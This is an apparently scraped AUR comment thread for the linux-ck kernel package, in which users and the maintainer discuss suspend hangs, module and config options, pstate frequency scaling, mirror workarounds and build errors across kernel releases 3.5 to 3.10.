@indie - I just refreshed 3.10.2-1-ck without bumping the pkgver. What changed? I added the patch you recommended but left it commented out. There is therefore no difference between this version and the original unless the user uncomments line 110. Why? I won't add an experimental patch to the PKGBUILD that is enabled by default. Please uncomment line 110 and test. Hopefully, if this patch indeed fixes the issue, it will be merged for inclusion in 3.10.3 proper. Also, if it works, I would encourage you to open a bug report against the official Arch kernel package linking the patch and describing your experiences with it.

I didn't know where to post; I couldn't find a bugzilla or something similar, so I decided to do it right here. I'm using the precompiled kernel linux-ck-core2 from your repository and I am no longer able to suspend my machine.
lip 18 10:12:48 HALF-BLOOD systemd[1]: Stopped A simple open wireless connection.
lip 18 10:12:48 HALF-BLOOD systemd[1]: Started netctl sleep hook.
lip 18 10:12:48 HALF-BLOOD systemd[1]: Starting Sleep.
lip 18 10:12:48 HALF-BLOOD systemd[1]: Reached target Sleep.
lip 18 10:12:48 HALF-BLOOD systemd[1]: Starting Suspend...
lip 18 10:12:48 HALF-BLOOD systemd-sleep[4388]: Suspending system...
Looks like everything is fine, but I end up with a flashing dash and all I can do is manually switch the power off.

@xzy - Well, it seems that this is i686-only and does exist in my ck1 builds.
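For the "how do I save the kernel log when the system hangs" question that keeps coming up in this thread: if the systemd journal is persistent (`mkdir -p /var/log/journal`, then restart journald or reboot), `journalctl -b -1` shows the previous, crashed boot, and the suspend sequence can be filtered out of it. A self-contained sketch — journal_sample is a stand-in for real journalctl output like the excerpt quoted above:

```shell
# journal_sample stands in for `journalctl -b -1` output; on a real system
# pipe journalctl into the same grep to isolate the sleep/suspend sequence.
journal_sample() {
  cat << 'EOF'
systemd[1]: Starting Sleep.
systemd[1]: Reached target Sleep.
systemd[1]: Starting Suspend...
systemd-sleep[4388]: Suspending system...
EOF
}
journal_sample | grep -E 'Sleep|Suspend'   # all four lines match
```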
% ls -l /usr/lib/modules/3.10.1-2-ck/kernel/drivers/of total 8 -rw-r--r-- 1 graysky users 2233 Jul 14 08:52 of_i2c.ko.gz -rw-r--r-- 1 graysky users 2776 Jul 14 08:52 of_mdio.ko.gz Dunno what to say about suspend. There is actually an Arch flyspray[1] about this so others are having problems without the ck1 patchset I think. 1. xzy3186 commented on 2013-07-15 15:17 Hi graysky, Thanks for your reply. Yes, the full name of the module is called of_i2c. I am using a 32-bit kernel with which I have the following output: yaourt -Ql linux | grep of_i2c linux /usr/lib/modules/3.10.1-1-ARCH/kernel/drivers/of/of_i2c.ko.gz Another problem I am suffering with linux-ck is that I could not suspend my system. If I do so, the system will get frozen (no way to wake it up without turning off the power). However, everything is working properly under official kernel... graysky commented on 2013-07-14 12:16 Bump to v3.10.1-2 Changelog: Set the CONFIG_INTEL_MEI* from hardcoded to modules following flyspray #36144[1] and the ubuntu bug report/lkml discussion therein. This may have positive effects for users experiencing graphical corruptions/black screens from suspend. Commit: 1. graysky commented on 2013-07-14 11:26 @xzy - I just copy the config/config.x86_64 from the ARCH set, and apply the ck1+bfq to it. What is the full name of the module? Is it 'of_i2c'? If I extract the 3.9.9-1-ARCH source and find for it, I do not find it. % find /scratch/old/usr/lib/modules -name 'of_i2c*' If I compare 3.10.1-2-ck to 3.10.1-1-ARCH, there are 107 modules that contain the term 'i2c': % find /scratch/arch/usr/lib/modules -name '*.ko.gz' | grep i2c | wc -l 107 % find /scratch/ck/usr/lib/modules -name '*.ko.gz' | grep i2c | wc -l 107 xzy3186 commented on 2013-07-14 02:08 Hi graysky, Do you have any idea why the kernel module of of_i2c is never compiled for linux-ck, including 3.10 and previous versions? I checked the official kernel and it is there. 
Furthermore, CONFIG_OF_I2C is set to 'm' in the config of linux-ck. In my sense, it should be compiled. BFQ is ready for 3.10 series. For those of you [misc] who like to see or build/run the pre-release of the next linux-ck as we wait for CK to patch into the new tree, I am hosting the incomplete (no ck1) stuff here: graysky commented on 2013-07-04 09:50 Bump to v3.9.9-1 Changelog: Commit: graysky commented on 2013-07-02 00:40 @misc - Did you open a bug with upstream by chance? I saw you logged one against the ARCH package[1]. Little worry about this affecting 3.10-1-ck since it takes CK ~1-1/2 weeks to release a BFS once a new major kernel is released (I came up with this number based on the last six bfs/ck-1 releases). Also, see the his blog wherein he talks about his travel plans extending the usual time out further[2]. 1. 2. - Seems like upstream would be eager to add this support to linux-next. If it's the same for Haswell as it is for ivy, it is a one-line patch as you pointed out. As of 19-Jun-2013, it doesn't look like there is support for Haswell: Bump to v3.9.5-2 Changelog: Sync'ed PKGBUILD with that of official ARCH. Functionally, there is no difference between 3.9.5-1 and 3.9.5-2; there is no need for users of 3.9.5-1 to update to 3.9.5-2. Commit: OK... I am now mirroring the patchset; you can directly modify the PKGBUILD like this or simply download it and manually move it into the build directory. 1) Download AUR source and extract 2) cd linux-ck 3) sed -i 's/^\"http:\/\/ck.kolivas.org\/patches\/3.0\/3.9/"http:\/\/repo-ck.com\/source\/ck1/' PKGBUILD SirWuffleton commented on 2013-05-26 09:36 @dkaylor Just finished a compile on one of my boxes and still had it around. I've got a temporary mirror here: I'll leave it up until either ck.kolivas.org comes back up or graysky hosts a mirror on repo-ck. @clayman - You should post on the bbs. I believe your interest is identifying a method to have the pstate driver honor niced processes? 
You might have better luck posting on the google+ thread: @hepha - Are you reporting that your machine is freezing at shutdown like in the flyspray you posted? @sphere - How are you reading the operating frequencies? My understanding is that a util like i7z in [community] accurately reports frequencies for sandy/ivybridge processors but older utils do not. What is the output of: `sudo i7z` It could be related to the pstate driver. This is the future of Linux power management and is included by upstream for sandybridge CPUs in 3.9 and has been slated (I think) for inclusion for ivybridge CPUs in 3.10 but this patch has been applied to linux-ck by default in 3.9.3. If you are experiencing problems with it using the ivybridge processor you can disable the patch in the PKGBUILD (just delete the 'y' in the line starting with _pstates_ivy=y). You can test to see if you are using pstates with this command: `cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver` If it returns a value of 'intel_pstate' then you are using them. petterk commented on 2013-05-21 18:21 After this update, my cpu is reportedly running at 3.1ghz even with powersave governor (same with performance, up to 3,4ghz), even tho the stock freq is 2.4ghz (even says so on a sticker on the front of the laptop). Previously it was running at around 1200mhz with ondemand and 2.4ghz with performance. Regards petterk commented on 2013-05-21 17:29 btw using ck-ivybridge on my i7-3630qm petterk commented on 2013-05-21 17:29 After the update to 3.9.3-1, my cpu is running at 3.1ghz instead of the stock 2.4ghz. Also, previously I had it running on on-demand when on battery, and Performance when on AC-adapter. Isnt the cpu using governors anymore? If thats the case, how can I set up a similar setup with LMT? Regards graysky commented on 2013-05-21 07:50 Not a stupid question. Both Sandy and Ivybridge CPUs get a more sophisticated method of managing frequency called pstates. 
This is true for linux-ck and linux (Arch standard). You aren't using the ondemand any more. Search for pstates in google and on the forums for more. clayman commented on 2013-05-21 06:58 Hi, probably a stupid question but hey -- with 3.9.3 I've been missing the /sys/devices/system/cpu/cpufreq/ondemand/ignore_nice_load setting. I'm running BOINC and this thing keeps my CPU temps low. Where did it go? I use standard config in this regard. mantiz commented on 2013-05-20 19:41 @graysky: I know that. ;-) And I already compiled the kernel with the PKGBUILD and patches provided here. But as you see in my last comment, the ck-patch takes care that the options that I think I need can not be enabled at the same time with BFS. As soon as I have some more time that I can spend on this I will contact Con Kolivas why these options are disabled and what the problems are in detail. I don't wanna harm my system or even worse my data. ;-) After that I will give this another try. But to be honest, I don't want a kernel that I have to compile on my own with each update. And since the only reason for me using the ck-kernel are large file copies because with the normal cfq-scheduler they cause many freezes on my machine I will use the "normal" kernel from the core-repo until then. Right now my priority is lxc and large file copies are not that often. ;-) But I am really thankful for your comments, helped me a lot otherwise I would still be trying to get the ck-kernel working and neglect my work that I really have to do now before anything else. :) graysky commented on 2013-05-20 19:17 @mantiz - Nothing is stopping you from compiling the arch kernel from ABS and enabling whatever patches you like in this PKGBUILD. Or by that same logic, replacing the config/config.x86_64 in this pkg with the stock arch ones, and simply commenting out the line that patches the code with the CK patchset. mantiz commented on 2013-05-20 16:11 @graysky: I unsuccessfully built this package on my own. 
Well, the build was successful and I was able to boot this kernel but the required features weren't there. After looking at the ck-patch it is obvious that this couldn't work because these settings are modified by "depends on !SCHED_BFS". So, I think you were right that these settings are conflicting with BFS. I will stick with the core-repo-kernel for now and see if I still need to use the bfq-scheduler or if I can live without it. And I will contact "him" in order to ask if there is any possibility to support these options or any workaround for this. I will post the answer here as soon as I have the time to write this mail and get an answer. Thanks for your help so far. graysky commented on 2013-05-20 13:55 @mantiz - Thanks for the link. I still recommend that you ask on CK's blog. He knows the code better than I :p mantiz commented on 2013-05-20 13:10 Ok, I don't think that user sessions are involved ("User namespace" is missing in the core-repo-kernel, too) but I really don't know systemd and cgroups very well, so I don't know which features are related to each other. I will try to add these options manually and see if this works. Thanks for the info, I didn't know that BFS has any problems with cgroups although it is mentioned in the wiki (my fault). You can get informations about lxc at if you are interested. It is also referred to as 'chroot on steriods'. ;-) graysky commented on 2013-05-20 12:49 Not sure what an archlinux-lxc-container is but if it is related to user sessions which depend on the cgroups you mentioned, they and BFS are mutually exclusive. In other words, BFS can't have them to the best of my knowledge. You might try posting this question to CK's blog to get an official answer from him. mantiz commented on 2013-05-20 12:45 I am having problems with starting an archlinux-lxc-container (with systemd) by using the ck-kernel(s). I am using linux-ck-nehalem and linux-ck-ivybridge on my systems. 
It turned out that the kernel from the core repo works fine, and I think the problem is that the ck kernels are missing "CONFIG_CGROUP_CPUACCT" and "CONFIG_CGROUP_SCHED", which are enabled in the core-repo kernel. Would it be possible to enable these options in the ck kernels? I would really appreciate this. ;-)

Hi, I'm having a strange issue in 3.9: I can't log in at a tty (I don't start in graphical mode by default). The login cursor doesn't appear, or blinks, and the keyboard seems not to be working (I can't switch between ttys). I can log in through ssh and shut down the system. I have compiled with a 300 Hz instead of 1 kHz tick rate, but the same happens. Is something like that happening to anybody? I've read about hangs on laptops here...

graysky commented on 2013-05-18 07:35
...think I am changing my mind about enabling the ivybridge pstates patch by default; I have read many positive things from folks using this for >4 weeks now with no ill effects. Sunday or Monday when 3.9.3 gets released, I will have it enabled by default for repo users too.

graysky commented on 2013-05-17 20:23
I misunderstood your question. There is no need to rename the package. Just enable the corresponding options (including the nconfig) and select your CPU type in the nconfig menu. You may select either the 3rd gen i7 option or, if building on the same machine, the native option.

This is just a patch. Edit the PKGBUILD and set the variable in the first few commented lines to enable it. Instructions and info are contained in the same section as well. Again, note that I am not enabling this by default, so repo users will not have this enabled.

Rebump of v3.9.2-2
Notes: I just updated v3.9.2-2 with an optional feature to enable the new Intel Pstate driver for Ivybridge CPUs. See the g+ thread[1] which is linked in this bbs thread. Again, this is 100% optional.
1.
2.
Commit: graysky commented on 2013-05-17 19:50 I just updated v3.9.2-2 with an optional feature to enable the new Intel Pstate driver for Ivybridge CPUs. See the g+ thread which is containing in this bbs thread. 1. graysky commented on 2013-05-12 20:05. I will be placing 3.8.13-1-ck along with all related package into the Archive Section on repo-ck should users want access to the now deprecated 3.8 series: The 3.9.2-2-ck build should be finished around midnight GMT and the repo populated with fresh 3.9.2-2-ck and related packages. Enjoy! graysky commented on 2013-05-12 18:23. graysky commented on 2013-05-12 12:04 Bump to v3.8.13-1 Changelog: BFQ gets updated to 3.8.0-v6r1 Commit: Notes: I am still trying to figure out why the freeze-on-reboot on my laptop (and now on my workstation) using the 3.9.2-1-ck code I posted about here on 2013-05-11 21:05. Det commented on 2013-05-12 11:09 v6r1 and .13 are up. graysky commented on 2013-05-11 21:05. Precompiled packages: Source to compile it yourself: Original post: affects my laptop gets resolved. What happens? When I reboot or shutdown, the system hangs after everything goes down. CK has edited his blog announcement acknowledging the behavior[1]. To date, I do not believe this issue is resolved. 20:41. Also note that I am building the packages as I type this, so expect them there in about 1/2 h if all goes well with my upstream bandwidth to godaddy (21:15 GMT). Precompiled packages: Source to compile it yourself: Original post: 19:52.1-1-ARCH throws the same text errors[2], but the system power cycles. That is in contrast to 3.9.1-1-ck which also complains about the connection being refused, (likely unrelated to the actual freeze), but then hangs until I power if off. 1. 2.:11 I'm trying to compile 3.9.1, but it's failing with: ... patching file sound/usb/usx2y/usx2yhwdeppcm.c patching file include/sound/emu10k1.h Reversed (or previously applied) patch detected! Skipping patch. 
1 out of 1 hunk ignored -- saving rejects to file include/sound/emu10k1.h.rej patching file sound/pci/emu10k1/emu10k1_main.c Reversed (or previously applied) patch detected! Skipping patch. 4 out of 4 hunks ignored -- saving rejects to file sound/pci/emu10k1/emu10k1_main.c.rej Any ideas? graysky commented on 2013-05-08 20:07 @Andre - I see. I can tell you that the nvidia-304xx and virtualbox modules do not show anything bad in my dmesg; both of these have not been compiled against 3.8.12. I did have to rebuild the broadcom-wl-ck module however. andre.vmatos commented on 2013-05-08 20:01 Hmm, IMHO, I think he means that 3rd-part modules (e.g. virtualbox) compiled for 3.8 series are showing errors, often symbol errors, upon insertion, avoiding it to load properly in 3.8.12, even when a compilation for 3.8 series are supposed to be binary-compatible with all 3.8 series (symbols and binary compatibility should change only in major (3.x) upgrades, requiring a recompilation or even patching). graysky commented on 2013-05-08 20:00 Meant to post this link to the pre-release of 3.9.1-ck which is nearly 100 %. It is just missing the official yet-to-be-released BFQ which Paolo tells me should not be different from the current release which patches into 3.9 just fine. Bump to v3.8.12-1 Changelog: Commit: Notes: Tpowa noted that the 3.8.12 release is a "binary module breaker" which I assume explains the mkinitcpio output when it built my fallback image: ==> WARNING: Possibly missing firmware for module: aic94xx ==> WARNING: Possibly missing firmware for module: bfa Dunno the scope of this and how it will affect users. CK has released an rc quality patch featuring v0.430 of BFS[1]. I am running it here and wanted to give folks the chance to tinker with it as well: Notes: 1) This is a pre-release so only download and compile the source if you accept that fact. 2) There is no BFQ yet, since Paolo has yet to release an updated patch. 
The old version of BFQ actually patches into the 3.9 tree without errors, but I do not want to run it until I hear back from him as to whether it is safe. 3) If you run this and find problems or you run this and find that it works just fine, please consider giving CK some feedback on the his blog I linked. 1. graysky commented on 2013-05-03 19:28 CK has released an rc quality patch featuring v0.430 of BFS. Running it here and wanted to give folks the chance to tinker with it as well: 1) There is no BFQ since Paolo has yet to release an updated patch. 2) The old version of BFQ actually patches into the 3.9 tree without errors, but I do not want to run it until I hear back from him as to whether it is safe. Kalrish commented on 2013-05-03 19:07 @graysky Thanks a lot, it worked like a charm -as always!-. @Det In my opinion, including a temp-host URL in a PKGBUILD would not be very... fair? I think it's up to the user to download the patch from an unofficial (yet useful) server. (In any case, is up again.) @misc - @Kalrish - Yeah, ck has been experiencing some addition problems with his VPS. I am hosting. Run this sed line on the PKGBUILD and you are good to go: sed 's/^\"http:\/\/ck.kolivas.org\/patches\/3.0\/3.8/"http:\/\/repo-ck.com\/source\/mirror/' PKGBUILD Plz do not flag out of date until all needed components are updated. From the wiki: "Linux-ck roughly follows the release cycle of the official ARCH kernel. The following are requirements for its release: Upstream code CK's Patchset BFQ Patchset ARCH config/config.x86_64 sets for major version jumps only"/ =) FYI-CK knows his shit is down; his VPS is doing a poor job fixing it. flamusdiu commented on 2013-04-14 11:35 @graysky - seems that the patch is missing on the repo-ck site now. :'( graysky commented on 2013-04-13 11:04 @fincan - Yeah, it's down alright. I am temp hosting the files on repo-ck.com. 
Run this on the dir with the PKGBUILD to build this until their servers are back up: sed -i 's/^\"http:\/\/ck.kolivas.org\/patches\/3.0\/3.8/"http:\/\/repo-ck.com\/source\/ck1_temp/' PKGBUILD fincan commented on 2013-04-13 05:55 is down? I could not download the patch graysky commented on 2013-04-12 22:24 Bump to v3.8.7-1 Changelog: Commit: graysky commented on 2013-04-08 20:07 Bump to v3.8.6-3 Changelog: Several to follow. *Add required build-time dependencies [bc will be needed in 3.9] (FS#34600). *Updated config files so as not to require user input as a function of the gcc patch. *Re-wrote PKGBUILD to use prepare function and opened [ FS#34688] to match my changes. *Added missing keys file in headers package. *Added "save configuration for later reuse" to match ARCH PKGBUILD. Commit: graysky commented on 2013-04-05 20:03 Bump to v3.8.6-1 Changelog: Commit: graysky commented on 2013-04-02 18:44 Yeah, looks like upstream's website is down. I am temp hosting the files on repo-ck.com. Run this on the dir with the PKGBUILD to build this until their servers are back up: sed -i 's/_bfqpath=.*/_bfqpath=\"http:\/\/repo-ck.com\/source\/bfq_temp\"/' PKGBUILD 3.8.3 has been released but I plan to wait for the ARCH package to see if tpowa et al incorporate any patches/fixes of their own before pushing. Plz flag this when 3.8.1-1-ARCH goes live if you see it before I do. I notice over a 50% drop in wireless bit rate using this kernel compiled for 2nd gen i7 i.e. i7-avx. Signal level and link quality are the same. ~~~~~~~~~~ Wifi Card: Intel Centrino 1000 N Driver: iwlwifi Laptop: Lenovo Ideapad y560p Diagnostic tool: iwconfig ~~~~~~~~~~ Symptoms: > 3.7.10-1-ARCH Kernel: --> Wireless connects quickly and sits at 150Mbps > 3.8.2-1 CK Kernel from AUR compiled for 2nd gen i7: --> Wireless sits around the 15-75Mbps rate, it starts low and builds its way up. Upon reaching ~75Mbps, the wireless bit-rate remains constant. It also takes longer to associate. 
Signal level and Link Quality are the same. ~~~~~~~~~ Steps to reproduce: 1. Install 3.8.2-1 CK Kernel for i7-avx with BFQ on default. 2. Use iwlwifi with Intel Centrino 1000 N wireless card. 3. Connect to wireless N router.: It would be perfectly valid to do such a thing on your end. Although I personally find nconfig simpler and more intuitive, you could modify your local PKGBUILD to include any of the *config options if you find one of the X-based tools to be more:19 : These analyses are an ANOVA showing you the time it took to compile (y-axis in sec) each of the 9 runs under each kernel (x-axis). Black dots = time points. Green diamonds = 95 % confidence intervals. The circles to the right are comparison circles. If these are separated, the differences in average times are statistically significant. In other words, BFS is still faster than CFS. This is true for both machines tested. Note that I will expand this to a few other machines in the next few days.: P.S. Sorry for multiple posts. Cannot edit as you know. graysky commented on 2013-03-03 19:13 . graysky commented on 2013-03-03 19:12 . misc @misc - Nothing was actually wrong with the patch, I mistakenly changed the source in the PKGBUILD to point to the patch for the 3.7 tree, not the 3.8 tree. This has been fixed and works with both arches. @radioact - No need, I have done this in the -0 release of linux-ck-3.8. See my comment below (2013-02-25 20:45) for the announcement and link. Still no update from CK by the way. @Raziel23 - Very helpful, thank you. Updated the PKGBUILD to reflect this new location. @MatejLach - I updated the PKGBUILD per your feedback using a find statement that shouldn't trip makepkg if nulls are found. I tested it forcing a delete of $srcdir/linux-3.7/include/config/dvb/*.h and it worked fine. Please build with it disabling the dvb shit as you do and report back. Note that I did not bump the pkgver version. MatejLach commented on 2013-02-27 19:59 I'm building 3.7.9-2 BTW. 
MatejLach commented on 2013-02-27 19:56 Indeed, when I delete this: mkdir -p "${pkgdir}/usr/src/linux-${_kernver}/include/config/dvb/" [[ -e include/config/dvb/ ]] && cp include/config/dvb/*.h "${pkgdir}/usr/src/linux-${_kernver}/include/config/dvb/" It is enough, to compile the kernel without problems. Were there any changes there compared to previous PKGBUILD? Isn't it misc who is always interested in the pre-release of package? The ground work has been laid for the 3.8 release. We just need CK to publish. For those who MUST have the code, it is below. REMEBER that there is no bfs in this yet!: The i686 architecture is still fully supported, I'm running the latest version of linux-ck on my i686 box with no issues whatsoever. If you are referring to the comment referencing PAE and i686, the only thing that comment was asking was to enable HIGHMEM64/PAE to allow more memory to be used by the i686 kernel without additional configuration on the user's end. In no way was it inferring that the i686 architecture is no longer being supported. Senth commented on 2013-02-12 21:54 then.. i686 architecture is not supported ? graysky commented on 2013-02-11 22:13 Bump to v3.7.7-1 Changelog: Commit: graysky commented on 2013-02-11 22:12 Hi, How can I get all of the sources? I am trying to build alsa-driver.hda-intel.hda-codec-realtek-git and getting the following error: The file /lib/modules/3.7.4-1-ck/build/include/INCLUDE_VERSION_H does not exist. Please install the package with full kernel sources for your distribution or use --with-kernel=dir option to specify another directory with kernel sources (default is /lib/modules/3.7.4-1-ck/build). Thanks, Mike nomodset took me to ttys in fedora kernel 3.7.2.204 64 bit. But Arch Testing 3.7.3 kernel or your kernel doesn't go beyond fsck. It just goes black. There has been a bunch of updates for intel KMS in this kernel. Not sure if that's the culprit. Not sure if anyone else is having the same issue too. - Correct. 
I am building up 3.7.2-2 right now. Even on my cluster, it take about 7 min per package. As you know, there are 25 packages across i686/x86_64 and all the cpu flavors to build. Should be online in 2-3 h from now. @graysky I have tried making linux-uksm-ck be able to disable uksm and become linux-ck, but in a very ugly way since if you disable ck or uksm, the kernel suffix remains -uksm-ck. I can only fix this problem in a very ugly way, so I would rather not to use a extremely ugly method to solve a ugly problem. The extremely ugly method is to modify linux-uksm-ck.install linux-uksm-ck.preset dynamically when makepkg is running. But it results in the wrong checksum when you want to rebuild the package. Then a more more more ugly method can be used, that is to change the checksum dynamically... So, is it better not to merge them? What do you think? - Yes, that it there to remove extra info from versioning just like in the ARCH kernel's PKGBUILD. If you are curious about it, simply copy the file that it modifies to a new name, run the sed line, then diff the two files. You will see. Thaodan commented on 2012-12-21 02:28 Im' updating my modifed linux-pf PKGBUILD (added propper package-naming description) and addded some changes that you done to your PKGBUILD (for example docs, turn of NUMA). And I found 'sed -ri "s|^(EXTRAVERSION =).*|\1 -${pkgrel}|" Makefile' in your PKGBUILD, for what is it? @kyak - Yes, it should. Thank you for reporting. It was a typo on my part in my repo build script which has been corrected a few min ago: @mrbit - This is an unfortunate limitation of the ncurses interface. 
You have two options: 1) Make your terminal larger before your run makepkg 2) Change line 183 to: make menuconfig This should do it for you: sed -i 's/make nconfig/make menuconfig/' PKGBUILD mrbit commented on 2012-12-12 12:40 _makenconfig="y" ==> Running make nconfig HOSTCC scripts/kconfig/nconf.gui.o HOSTCC scripts/kconfig/nconf.o HOSTLD scripts/kconfig/nconf scripts/kconfig/nconf Kconfig Your terminal should have at least 20 lines and 75 columns make[1]: *** [nconfig] Errore 1 make: *** [nconfig] Errore 2 ==> ERRORE: kyak commented on 2012-12-12 12:36 Hi graysky, I think that virtualbox-ck-host-modules-core2 should replace virtualbox-ck-host-modules-corex. Otherwise i have to resolve conflict between virtualbox-ck-host-modules-corex and linux-ck-core2 manually (i.e. remove virtualbox-ck-host-modules-corex, then replace linux-ck-corex with repo-ck/linux-ck-core2, then install virtualbox-ck-host-modules-core2). graysky commented on 2012-12-12 12:25 @mrbit - You will need to edit the PKGBUILD and change the nconfig option to "y" before you compile. Once you start makepkg to compile, you will be presented with the usual nconf. The cpu options can be enabled under: Processor type and features>Processor family Note that I am pretty sure the i5-2400 is a sandy bridge (gen2 core processor). You should google around to be sure. mrbit commented on 2012-12-12 11:13 how to change the config.x86_64 for Intel(R) Core(TM) i5-2400 CPU @ 3.10GHz ?? graysky commented on 2012-12-12 10:38 @snack - Yes, I did change my key. Sorry, I posted this to the support thread in the bbs but not here: "Already all, hosting issues are fixed and repo is populated with new packages. Note that I generated a new gpg key and revoked the old one. Pacman should grab it automatically. YOU WILL NEED TO SIGN THE KEY. Do so after pacman imports it or after you manually import it. % sudo pacman-key --lsign-key 5EE46C4C ==> Updating trust database... Enjoy!" 
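Several of the fixes in this thread are one-line sed edits of the PKGBUILD. Running them against stand-in files (the file contents and pkgrel value below are illustrative, not the real files) shows exactly what each substitution changes; the mirror rewrite is written here with | as the sed delimiter to avoid the backslash escaping in the original one-liners.

```shell
# 1) Mirror rewrite: point the ck patch source at the temp host on repo-ck.com.
printf '"http://ck.kolivas.org/patches/3.0/3.8/3.8-ck1/patch-3.8-ck1.bz2"\n' > PKGBUILD.demo
sed -i 's|^"http://ck.kolivas.org/patches/3.0/3.8|"http://repo-ck.com/source/ck1_temp|' PKGBUILD.demo
cat PKGBUILD.demo    # "http://repo-ck.com/source/ck1_temp/3.8-ck1/patch-3.8-ck1.bz2"

# 2) EXTRAVERSION stamp: put the package release into the kernel version string.
pkgrel=2
printf 'VERSION = 3\nEXTRAVERSION =\n' > Makefile.demo
sed -ri "s|^(EXTRAVERSION =).*|\1 -${pkgrel}|" Makefile.demo
grep '^EXTRAVERSION' Makefile.demo    # EXTRAVERSION = -2

# 3) nconfig -> menuconfig, for terminals too small for nconf.
printf 'make nconfig\n' > nconfig.demo
sed -i 's/make nconfig/make menuconfig/' nconfig.demo
cat nconfig.demo    # make menuconfig
```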
snack commented on 2012-12-12 03:30 While trying to install 3.6.10 I get: errore: linux-ck-core2: key "88A032865EE46C4C" is unknown errore: key "88A032865EE46C4C" could not be looked up remotely errore: linux-ck-core2-headers: key "88A032865EE46C4C" is unknown errore: key "88A032865EE46C4C" could not be looked up remotelyù I didn't get this error with previous updates. Graysky, did you change your key? Or is there something wrong in my pacman keyring? pub 2048R/6176ED4B 2011-11-07 uid graysky <graysky@archlinux.us> sub 2048R/9B453E32 2011-11-07 graysky commented on 2012-12-12 01:23 @misc - Ha, sure. I haven't tested it, but did diff it against the official one. Plz test and lemme know if bad. Note to other users - This is PRERELEASE package and does not contain ck1 or bfq! To answer your question, no, there are changes to the PKGBUILD as well. See: I tested the 'kernel-36-gcc47-1.patch' written by André Ramnitz using three different machines running a generic x86-64 kernel and an otherwise identical kernel running with the optimized gcc options. Conclusion: There are small but real speed increases using a make endpoint to running with this: @misc - If memory serves me, Steven told me that the perl script you mentioned differs from the call to `make localmodconfig` somehow. Plz follow-up with him and let me know. @xzy3186 - Not sure... plz try with the linux package from [testing] and verify that it isn't an upsteam bug. Seeing that streamline_config.pl is still being actively maintained ( ), wouldn't it be worth to try out how it performs? Only as precursor to localmodcfg, not on its own, of course. I mean, if the Steven Rostedt still truly considered it such a bad idea, wouldn't they have removed it by now?:28 @graysky, Thanks, i understand that these CPU-specific options are "under Processor type and features>Processor family or by setting-up the .config file accordingly." However, i'm wondering how do you build linux-ck-corex from this PKGBUILD? 
Are you using some script to modify .config or you are choosing the processor manually every time? Also, the package name is "linux-ck-corex", not just "linux-ck", so you definitely change the PKGBUILD. Could you tell more about how you do it, so i could rebuild linux-ck-corex here? For now all i got is this PKGBUILD, and it is not straigtforward how to get binary linux-ck-corex out of it. Is there any way to include a custom DSDT? nconfig does not enable the necessary options to be edited. Also I'm assuming if we want to compile with optimizations we would put them in $MAKEFLAGS, correct? For example on my 2600k I would use -j9 and --mtune=native, where would those go?x - OK. Glad to hear that it is again not a problem with the ck patches, but with the upstream. You should spend some time googling for the specific crash. On one of my boxes, I found that the 3.6 series crashes if I power down with my lirc modules probed. If I rmmod them and then shutdown, no issues at all.x - First question I always ask is: have you also tested version x from the official repos... in this case however, the devs have not bumped 3.6.3-->3.6.4 yet. As soon as they do, I would ask you to test it and see if you get the same problem. I actually have yet to see a panic that was caused by ck's stuff. jqww2002 commented on 2012-10-29 08:23 I got a panic after update to v3.6.4 (x86) today from repo-ck.com. The panic message is "PANIC:early exception 08 rip246:10 error 81041d86 cr2 0". I try google and find that adding mem=4000M to grub, all it's ok. But I have 6G mem, v3.6.3 is all ok. Can any help? Glad to see its not specific to me or iPhones. I just tried out linux-mainline from AUR (3.7-rc2) and it does not have any issues with copying files though nautilus/gvfs-afc, so I guess the issue is only in the 3.6 series atm.: that's correct. I have a specific BUILDDIR setup in makepkg.conf and I think this is a valid thing to do. 
It helps keep the older builds around (for debugging, speeding up the builds and so on). So, it's good if the PKGBUILD explicitly references the patches/files to be used. Can you modify the PKGBUILD to specifically look for the 3.6 BFQ patches? My source directory happens to have both the older 3.5 patches and the newer 3.6 patches for BFQ. I guess it is probably better to hardcode patch names in PKGBUILd. Just a FYI: I'm stick at 3.5.x because there is a serious problem [1] of zram in the 3.6 tree. A patch was submitted two days ago but not seen in the latest 3.6.2 build. And @graysky, there is a 3.5.7 release, maybe it's appropriate to update to it? [1] graysky commented on 2012-10-13 14:43 @OK100 - Not out-of-date. I am aware of the release; see my previous comment. I am in email contact with Con now attempting to diagnose and fix. graysky commented on 2012-10-13 13:34 OK! CK just released[1] an OFFICIAL CK1 with bfs v0.425 that patches into the 3.6 tree, however it has a slight problem and will not build with guest virtualization enabled which as you know is part of the stock ARCH config. I emailed him and hope to have a fix soon. I will keep you updated. [1] graysky commented on 2012-10-13 13:33 OK! CK just released an OFFICIAL CK1 with bfs v0.425 however it has a slight problem and will not build with guest virtualization enabled which as you know is part of the stock ARCH config. I emailed him and hope to have a fix soon. I will keep you updated. graysky commented on 2012-10-11 01:06 Just wanted to update the group -. For those interested, I have the source package 3.6.1-4 which you can download and build yourself. This version has the aforementioned option disabled and builds just fine for me (both x86_64 and i686). Download it from here: graysky commented on 2012-10-11 00:50 Well guys -. [ ] Processor type and features --->Paravirtualized guest support ---> Just wanted to update the group. 
It's been some time that I've used linux-ck-p4 without any problem, but today, while attempting the upgrade to version 3.5.5-1, I had this problem (pacman output translated from Italian):

Packages (2): linux-ck-p4-3.5.5-1 linux-ck-p4-headers-3.5.5-1
Total size of packages to install: 91.71 MiB
Net upgrade size: 0.00 MiB
Proceed with installation? [Y/n] y
(2/2) checking package integrity [########################################] 100%
error: linux-ck-p4: signature from "graysky <graysky@archlinux.us>" is unknown trust
error: linux-ck-p4-headers: signature from "graysky <graysky@archlinux.us>" is unknown trust
error: failed to commit transaction (invalid or corrupted package (PGP signature))
Errors occurred, no packages were upgraded.
[root@bridge-live mikronimo]#

@stlifey - Nice. Although the web interface seemed to give me a backwards patch, applying with the -R switch is just fine. Will test a bit and then upload. Until then, check my math: you need to apply with:

patch -Rp1 -i $srcdir/unfuck.patch

commented on 2012-10-02 19:36

@fincan - I saw it, but ck1 [bfs] does not patch into it due to some upstream changes:

==> Patching source with ck1 including bfs v0.424
drivers/cpufreq/cpufreq_conservative.c
patching file arch/x86/Kconfig
patching file kernel/sched/bfs.c
patching file kernel/sched/Makefile
patching file mm/vmscan.c
Hunk #2 succeeded at 928 (offset 32 lines).
Hunk #3 succeeded at 1921 (offset 32 lines).
Hunk #4 succeeded at 2873 (offset 32 lines).
Hunk #5 succeeded at 2885 (offset 32 lines).
patching file include/linux/swap.h
patching file mm/memory.c
patching file mm/swapfile.c
patching file mm/page-writeback.c
Makefile
==> ERROR: A failure occurred in build().
